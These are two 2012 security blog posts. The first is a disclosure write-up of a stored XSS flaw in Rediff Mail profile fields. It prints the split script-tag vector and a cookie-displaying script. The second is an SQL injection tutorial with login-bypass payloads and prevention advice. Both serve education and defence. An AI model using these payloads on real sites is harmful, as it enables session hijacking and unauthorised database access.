Monday, November 12, 2012

Stored XSS On Rediff Mail

Hi Guys, I recently discovered Stored XSS Issue on Rediff mail and also reported this issue to Rediff Recently. :-)
But didn't get any Credit but Still never mind.
They actually dropped me mail on personal id that issue has been fixed now.
I will show exact demonstration of that Stored XSS issue.
But, First of all i will tell you what XSS is basically.

XSS (Cross-Site Scripting)-
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. 
There are basically two types of XSS:
1) Reflected XSS Attacks
2) Stored XSS Attacks

So, Let  get Start with attack
Now, this is an extremely critical vulnerability as the user will be attacked by simply visiting malicious user profile and the malicious script will execute on the victim browser.
Here is a proof of concept  of Stored XSS on Rediffmail:)
1)Hosted JavaScript File locally
with following content:
"document.write ("Stored XSS " + document.cookie);
alert ("cookie Value" + document.cookie);
"
Hosted JavaScript for XSS:Securityvin32
2)Parameter Affected: School and college combined
Here is the tricky part i faced during XSS
here individual school and college parameter didn't get xss alert.
So i tried to combined both field by using following vector:
School:
/><SCRIPT SRC="http://localhost/xss/xss.js"/*
College: 
*/></SCRIPT>

3) After saving the attack vector in his profile.
Any user who visit attacker profile will get malicious script executed on his browser.


Thursday, August 9, 2012

SQL Injection

Hi today i am going to explain thing you have to know about SQL Injection.
  1. What is SQL injection 
  2. How it work  
  1. What is SQL injection:-SQL injection is attack vector in which attacker directly execute SQL query to database from Vulnerable Web Application. Attacker can perform any sql query like select, update, create, delete type of query on Database. Sql Injection is not limited to gaining access to database it can also lead to compromising of Operating System. 
  2. How it work: SQL injection work by breaking the original Sql query using OR,UNION,AND. 
For e.g.: If  Web Application is having form of Sign in where User enters Username and His Password  for authentication where following SQL Query is made by Web Applications.
User_table having following database
ID
USERNAME
PASSWORD
1
Admin
Admin
2
Vinesh
Security
3
Vin32
Vin32
4
Secure
Secure
 
Select * from User_table where Username="Vinesh" and Password="security"
What if attacker uses this functionality to performe Sql injection by breaking above sql query.
Attack vector:  "or 1=1--
When attacker uses this attack vector in Username field following query will execute by web application.
Select * from User_table where Username=" "or 1=1--and Password="security"
As you can see that the query is having blank username with or condition of 1=1 which is always true and comment out rest of the password part so it will not check for password field.
So attacker would logon with 1st username that is admin without entering any credential.
 Similar Attack Vector Used in Sql Injection
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* ' 


Below mentioned are the Source code vulnerable to  SQL Injection.

Where user enters his id and get details of his firstname and lastname.
What if attacker use this feature and exploit using SQL Injection and get all the details of in database.


How to prevent SQL Injection
  • Use of Prepared Statements (Parameterized Queries)
  • Use of Stored Procedures
  • Escaping all User Supplied Input
  • Also Enforce: Least Privilege user
  • Also Perform: White List Input Validation
Reference URL:
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
https://www.owasp.org/index.php/SQL_Injection